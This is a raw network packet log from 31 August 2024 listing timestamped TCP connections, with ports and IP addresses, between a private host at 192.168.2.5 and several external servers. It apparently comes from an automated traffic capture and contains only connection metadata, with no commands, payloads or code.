Aug 31, 2024 15:44:14.236778975 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236788988 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236798048 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236809015 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236819983 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236824036 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236829996 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236839056 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236849070 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236849070 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236860991 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236887932 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.237049103 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237059116 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237068892 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237091064 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.237111092 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237114906 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.237121105 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237131119 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237138033 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.237159967 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.237169981 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.376465082 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.419164896 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.481498003 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.486310959 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.543354988 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:14.548229933 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:14.548301935 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:14.548410892 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:14.553443909 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:14.666435003 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.686466932 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.691369057 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.870919943 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.879173040 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.884004116 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.884012938 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.884016991 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.884222984 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.884231091 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.884238005 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.904536963 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.904901981 CEST	49725	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.909723043 CEST	80	49725	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.909806967 CEST	49725	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.909946918 CEST	49725	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.910212994 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.910322905 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.915361881 CEST	80	49725	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:15.156325102 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:15.200447083 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:15.305286884 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:15.305346012 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:15.409473896 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:15.414378881 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:15.662327051 CEST	80	49725	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:15.662378073 CEST	49725	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:15.668282032 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:15.668720007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:15.673782110 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:15.673841000 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:15.673995972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:15.674057007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:15.680608988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:15.685434103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:15.695580006 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:15.700311899 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:15.880398989 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:15.882814884 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:15.887645006 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:16.067333937 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:16.122275114 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:16.242801905 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:16.242885113 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:16.254162073 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:16.259639978 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:16.304042101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:16.304101944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:16.506169081 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:16.506266117 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:16.506305933 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:16.506486893 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:16.507596970 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:16.512993097 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:16.760096073 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:16.764909983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:16.922485113 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:16.927361965 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:16.999882936 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.001521111 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.006349087 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.020313978 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.020325899 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.020395041 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.020395041 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.134116888 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.134131908 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.134143114 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.134152889 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.134164095 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.134198904 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.184742928 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.184798002 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.184802055 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.184865952 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.184866905 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.185765982 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.225184917 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.229953051 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.259592056 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.267791033 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.275136948 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.275207996 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.275226116 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.275294065 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.334033966 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.334048986 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.334064960 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.334136963 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.334155083 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.335645914 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.340390921 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.409605026 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.415468931 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.420253992 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.467160940 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.469722986 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.474534988 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.504751921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.504766941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.504780054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.504791975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.504823923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.504870892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.506068945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506081104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506100893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506110907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506120920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506133080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.506138086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506154060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.506170988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.506206036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.509670019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.509737968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.509743929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.509783983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.581871986 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.581943035 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.594672918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594685078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594697952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594739914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.594779968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.594818115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594835043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594851971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594862938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594866037 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.594876051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.594887018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.594906092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.594932079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.596570969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596591949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596635103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596641064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.596693039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596704006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596714973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596724987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.596725941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.596734047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.596756935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.596785069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.597541094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597551107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597557068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597589970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597598076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.597600937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597614050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597625017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597635031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.597640038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.597660065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.597681046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.599554062 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.599589109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.599642992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.599653959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.599664927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.599694014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.599728107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.651952028 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.676261902 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.681042910 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:17.685369015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685379982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685389996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685431004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685476065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685539961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685549974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685591936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685652018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685664892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685703039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685723066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685734034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685741901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685770035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685770988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685780048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685794115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685796022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685828924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685842991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685894012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685905933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.685940027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.685964108 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:17.687083960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687094927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687103987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687139034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687165976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687199116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687238932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687269926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687284946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687294960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687304974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687313080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687325001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687339067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687377930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687388897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687397957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687427998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687448025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687666893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687685966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687695980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687711954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687728882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687773943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687788963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687799931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687812090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687820911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.687824965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687838078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.687866926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.688242912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688297033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.688416958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688433886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688445091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688453913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688463926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688477039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.688477039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688493013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688503027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.688503027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.688513994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.688554049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.690308094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690327883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690337896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690376043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.690380096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690397024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690423965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.690448999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.690562010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690572023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690581083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690594912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.690613985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.690644026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.694084883 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699222088 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699230909 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699240923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699249983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699265957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699273109 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699312925 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699326038 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699333906 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699342012 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699357033 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699364901 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699368954 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699395895 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699434996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699444056 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699479103 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699521065 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699532986 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699568033 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699580908 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.699594975 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699604034 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.699645042 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704154968 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704294920 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704343081 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704385996 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704396009 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704408884 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704416990 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704428911 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704459906 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704477072 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704494953 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704499960 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704516888 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704535961 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704545975 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704551935 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704577923 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704588890 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704613924 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.704627991 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.704679966 CEST	26212	49715	95.179.250.45	192.168.2.5
